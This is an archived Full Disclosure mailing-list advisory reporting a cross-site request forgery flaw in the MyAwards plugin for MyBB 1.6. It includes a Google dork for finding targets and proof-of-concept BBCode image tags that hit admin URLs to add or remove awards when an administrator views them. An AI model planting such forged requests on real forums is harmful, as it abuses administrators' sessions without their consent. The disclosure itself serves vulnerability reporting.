[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] MyBB 1.6 - MyAwards CSRF
From: surivaton surivaton <surivaton () gmail ! com>
Date: 2014-08-22 8:52:01
Message-ID: CAFqzMLUXaKQXqtjj4v_ysrFksJERkR=GJuyw5hTUohuNkksgJA () mail ! gmail ! com
[Download RAW message or body]
# Google Dork: allinurl:myawards.php
# Date: 08/17/2014
# Exploit Author: Vagineer https://vagineering.me
# Version: ALL VERSIONS
# Tested on: MyBB 1.6.15
PoC(set this as your signature or iframe it)
Add awards
[img]
https://website.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awid=1&awuid=2
[/img]
Remove awards
[img]
https://website.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1
[/img]
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic